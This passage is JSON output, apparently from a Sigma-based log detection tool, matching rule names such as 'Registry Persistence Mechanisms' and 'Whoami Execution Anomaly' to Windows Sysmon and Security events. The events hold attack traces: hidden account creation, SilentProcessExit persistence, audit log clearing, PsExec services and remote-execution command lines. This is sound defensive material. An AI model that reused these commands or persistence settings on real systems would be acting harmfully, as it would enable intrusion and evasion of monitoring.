21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966544,"Execution":{"#attributes":{"ProcessID":1564,"ThreadID":1252}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-777F-5C91-0000-0010B95B0000","ProcessId":524,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 23:13:04.090"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966594,"Execution":{"#attributes":{"ProcessID":988,"ThreadID":1644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T23:18:50.627750Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 09:28:22.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134365,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T09:28:22.280355Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:03:04.489"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134385,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T10:03:04.489480Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\sqlsvc\\(Default)","UtcTime":"2020-09-04 10:33:31.842"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134399,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T10:33:31.843489Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:54:22.973"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134408,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T10:54:22.974353Z"}},"Version":2}}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 11:00:24.601"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134411,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6528}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-04T11:00:24.602530Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Registry Persistence Mechanisms"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000200)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F5D-5D0A-0000-00109B331300","ProcessId":1356,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag","UtcTime":"2019-06-19 17:22:41.709"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8034,"Execution":{"#attributes":{"ProcessID":284,"ThreadID":2076}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-19T17:22:41.709638Z"}},"Version":2}}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F61-5D0A-0000-0010DB351300","ProcessId":2504,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\ReportingMode","UtcTime":"2019-06-19 17:22:43.912"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8036,"Execution":{"#attributes":{"ProcessID":284,"ThreadID":2076}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-19T17:22:43.944013Z"}},"Version":2}}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\temp\\evil.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F63-5D0A-0000-0010F93A1300","ProcessId":1956,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\MonitorProcess","UtcTime":"2019-06-19 17:22:45.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8038,"Execution":{"#attributes":{"ProcessID":284,"ThreadID":2076}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-19T17:22:45.694013Z"}},"Version":2}}}},{"detection":["WMI Event Consumer Created Named Pipe","WMI Persistence - Script Event Consumer File Write","WMI Persistence - Script Event Consumer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\scrcons.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Standard Event Consumer - scripting","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=6AEC20B9D4C1AB6F1AB297F28EB6BF93,IMPHASH=CCEC86CC0D16062391CC627BC9466A62","Image":"C:\\Windows\\System32\\wbem\\scrcons.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-701F-5CA5-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-7020-5CA5-0000-0010ED6A0000","ParentProcessId":596,"ProcessGuid":"365ABB72-F76F-5CA4-0000-0010AA201700","ProcessId":2636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-03 18:11:59.996"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":7203,"Execution":{"#attributes":{"ProcessID":1828,"ThreadID":372}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-03T18:12:00.016862Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\programdata\\StartupNewHomeAddress","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-BFB2-5CED-0000-0010F2C03600","ProcessId":1520,"RuleName":"Persistence - Startup User Shell Folder Modified","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\startup","UtcTime":"2019-05-28 23:09:38.589"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6625,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2420}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-28T23:09:38.589832Z"}},"Version":2}}}},{"detection":["Usage of Sysinternals Tools","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\PsExec64.exe","ProcessGuid":"747F3D96-53D8-5D75-0000-00101811CD00","ProcessId":6868,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Sysinternals\\PsExec\\EulaAccepted","UtcTime":"2019-09-08 19:17:44.203"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38292,"Execution":{"#attributes":{"ProcessID":2956,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-08T19:17:44.249169Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\Start","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38294,"Execution":{"#attributes":{"ProcessID":2956,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-08T19:17:44.350762Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"%%SystemRoot%%\\PSEXESVC.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38295,"Execution":{"#attributes":{"ProcessID":2956,"ThreadID":2088}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-08T19:17:44.391389Z"}},"Version":2}}}},{"detection":["Remote PowerShell Session Host Process (WinRM)"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\administrator\\Documents\\","Description":"Hostname APP","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","IntegrityLevel":"High","LogonGuid":"DFAE8213-BEAD-5CDC-0000-0020AFDA1500","LogonId":"0x15daaf","ParentCommandLine":"C:\\Windows\\system32\\wsmprovhost.exe -Embedding","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","ParentProcessGuid":"DFAE8213-BEAD-5CDC-0000-0010DDDB1500","ParentProcessId":3332,"ProcessGuid":"DFAE8213-BF0B-5CDC-0000-00105A951600","ProcessId":2936,"Product":"Microsoft® Windows® Operating System","RuleName":"Lateral Movement - Windows Remote Management","TerminalSessionId":0,"User":"insecurebank\\Administrator","UtcTime":"2019-05-16 01:38:19.616"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18002,"Execution":{"#attributes":{"ProcessID":1792,"ThreadID":2232}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-16T01:38:19.630865Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":566821,"Execution":{"#attributes":{"ProcessID":780,"ThreadID":3480}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-19T00:02:00.383090Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /Q /c c:\\windows\\system32\\rundll32.exe c:\\programdata\\7okjer,#1 1> \\\\127.0.0.1\\C$\\WqEVwJZYOe 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-75D0-5F8B-0000-0020A8A83300","LogonId":"0x33a8a8","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-75D1-5F8B-0000-00101DAB3300","ParentProcessId":2228,"ProcessGuid":"747F3D96-75D1-5F8B-0000-001088C23300","ProcessId":2784,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\Administrator","UtcTime":"2020-10-17 22:53:05.776"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":421227,"Execution":{"#attributes":{"ProcessID":3236,"ThreadID":4832}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T22:53:05.777453Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-12-09 22:45:33.087","Image":"System","ProcessGuid":"747F3D96-CDE2-5FD1-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onedrive.exe","UtcTime":"2020-12-09 22:45:33.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":549541,"Execution":{"#attributes":{"ProcessID":3428,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-12-09T22:45:33.090853Z"}},"Version":2}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":2171289,"Execution":{"#attributes":{"ProcessID":420,"ThreadID":996}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-02T11:47:39.499106Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x38a14","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["Whoami Execution Anomaly"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"365ABB72-B0C0-5CC8-0000-001017C31C00","ParentProcessId":836,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ProcessId":2828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9828,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:32:51.324839Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ParentProcessId":2828,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010373E1D00","ProcessId":3328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9829,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:32:51.371714Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415266,"Execution":{"#attributes":{"ProcessID":3336,"ThreadID":4516}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-13T23:06:02.889794Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\Security\\staging","UtcTime":"2020-10-13 